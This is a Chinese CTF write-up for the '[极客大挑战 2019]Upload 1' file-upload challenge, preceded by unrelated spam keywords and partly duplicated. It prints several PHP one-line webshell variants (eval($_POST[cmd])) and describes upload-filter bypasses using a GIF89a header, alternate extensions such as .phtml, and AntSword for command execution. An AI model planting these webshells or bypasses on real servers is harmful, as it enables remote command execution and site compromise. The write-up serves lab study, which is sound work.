百度网站推广,室内设计公司招聘,58商机创业网,安丘网站建设报价[极客大挑战 2019]Upload 1
审题 看到是一个文件上传类题型。
知识点
一句话木马的注入
知识点详解
一句话木马的原理
eval()函数会将参数作为PHP代码进行执行#xff0c;因此通过eval()函数中的参数v提交要执行的代码即可完成漏洞利用。语句中的符号作用是可以屏蔽函数…[极客大挑战 2019]Upload 1
审题 看到是一个文件上传类题型。
知识点
一句话木马的注入
知识点详解
一句话木马的原理
eval()函数会将参数作为PHP代码进行执行因此通过eval()函数中的参数v提交要执行的代码即可完成漏洞利用。语句中的符号作用是可以屏蔽函数执行过程中遇到问题而产生的一些错误、警告信息这样用户就看不到程序的出错信息。如此一来,即使$_POST[]变量没有获取到参数值时也不会报错。这样除了用户界面会友好一些外更重要的是安全性因为屏蔽了出错文件的路径等信息。 成功上传一句话木马文件后可以直接用菜刀或蚁剑连接也可以访问文件上传路径实现任意命令执行通过v参数传入命令执行函数system()执行system()函数中的系统命令。
一句话木马的基本写法。
1.?php eval($_POST[cmd]);?
2.?eval($_POST[cmd]);?
3.script languagephpeval($_REQUEST[cmd])/script绕过后缀的有文件格式有php,php3,php4,php5,phtmlpht
解题
上传含有一句话木马的b.txt文件并使用bp抓包更改后缀
其中前面加上GIF89a这个可以伪造成jpg格式的文件。
看到更改为.php后缀时显示NOphp所以尝试其他后缀.phtml成功绕过。但题目又写到nohacker你的文件有? 所以使用另一种一句话木马格式
更改后发现上传成功 一般上传后的文件在/upload/路径下。 打开b.phtml连接蚁剑。 在根目录下找到flag。